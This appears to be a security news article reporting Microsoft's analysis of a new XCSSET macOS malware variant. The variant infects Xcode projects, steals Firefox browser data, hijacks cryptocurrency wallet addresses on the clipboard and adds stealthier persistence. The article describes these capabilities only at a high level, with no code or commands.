XCSSET macOS Malware Evolves: New Variant Targets Firefox, Hijacks Clipboard for Crypto Theft

Microsoft Threat Intelligence has identified yet another variant of the XCSSET malware, a long-running macOS threat targeting software developers through malicious Xcode project infections. This new version brings expanded functionality, advanced obfuscation, and new persistence tactics—making it one of the most sophisticated macOS malware strains currently active.

As Microsoft explains, “The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications.”

This supply-chain style tactic ensures the malware spreads organically across developer communities.

The latest variant introduces several new modules and updated behaviors:

• Browser Data Theft: “It expands its data exfiltration capabilities to include Firefox browser data.”
• Using a modified version of the HackBrowserData project, the malware extracts passwords, cookies, credit card details, and history.
• Clipboard Hijacking for Crypto Theft: “This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets.” If a match is found, XCSSET replaces the copied wallet address with one controlled by the attacker.
• Persistence Upgrades: A new LaunchDaemon-based persistence module allows XCSSET to disable Apple’s Rapid Security Response and security configuration updates, while masquerading as a fake “System Settings.app” to avoid detection.
• Stealthy Execution: The malware employs “sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution,” making analysis and detection far more difficult.

Microsoft notes that the first three stages mirror earlier variants, but the fourth stage has been heavily upgraded. It begins with the boot() function, which now includes “additional checks for Firefox browser and modified logic for Telegram existence check” and downloads new malicious submodules.

These modules handle tasks such as data validation, encryption/decryption of C2 communications, and stealthy clipboard monitoring with multiple conditions to ensure realistic behavior before replacing sensitive data.

Although attacks remain limited in scope, the group’s tactics indicate a targeted campaign against macOS developers and users in the cryptocurrency and tech sectors. Microsoft warns, “While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re publishing our comprehensive analysis to increase awareness of this evolving threat.”

The company has also collaborated with Apple and GitHub to take down repositories hosting malicious Xcode projects.

The new XCSSET variant shows how macOS malware continues to mature, with advanced obfuscation, targeted data theft modules, and persistence mechanisms designed to bypass Apple’s defenses. By targeting developers and leveraging shared project files, XCSSET represents not just a malware strain, but a supply-chain threat to the broader Apple ecosystem.

Related Posts:

• XCSSET Malware Returns with Enhanced Capabilities to Target macOS Users
• Apple’s Xcode Is Getting Native Claude AI Integration
• XCSSET Malware Returns with Enhanced Obfuscation and Persistence Techniques
• Clipboard security issues found in Chromium, Firefox, and Apple Safari browsers